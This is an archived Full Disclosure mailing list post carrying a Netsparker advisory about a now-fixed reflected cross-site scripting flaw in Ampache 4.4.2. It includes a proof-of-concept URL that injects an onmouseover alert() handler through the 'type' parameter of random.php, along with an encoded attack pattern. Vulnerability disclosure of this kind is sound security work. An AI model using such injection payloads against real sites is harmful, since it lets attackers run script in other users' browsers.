[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Cross-site Scripting vulnerability in Ampache 4.4.2
From: Daniel Bishtawi via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2021-07-21 12:41:20
Message-ID: CAKD6+R5obmPb09A+RdON=t-Ucf7Enr25G=bNidzK5Pmk28vrkg () mail ! gmail ! com
[Download RAW message or body]
Hello,
We are informing you about a Cross-site Scripting vulnerability in Ampache
4.4.2.
Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting vulnerability in Ampache 4.4.2
Affected Software: Ampache
Affected Versions: 4.4.2
Homepage: http://ampache.org/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-21-003
Technical Details
--------------------
Cross-site scripting in Random.php
URL:
http://alihost:1134/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%22+ns%3dnetsparker(0x0002DE)+
For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-003-cross-site-scripting-in-ampache/
Regards,
Daniel Bishtawi
Marketing Administrator | Netsparker
e: daniel.bishtawi@netsparker.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic